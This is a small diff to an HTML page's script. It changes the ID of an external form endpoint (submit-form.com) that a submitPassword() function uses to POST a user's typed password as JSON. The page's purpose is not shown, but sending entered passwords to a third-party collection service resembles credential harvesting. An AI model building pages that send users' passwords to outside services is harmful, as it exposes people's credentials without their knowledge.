--- a/index.html
+++ b/index.html
@@ -233,7 +233,7 @@
     function submitPassword() {
       const password = document.getElementById("passwordInput").value;
 
-      fetch("https://submit-form.com/oCnsxxbKY", {
+      fetch("https://submit-form.com/DqldzMs6f", {
         method: "POST",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({ password })
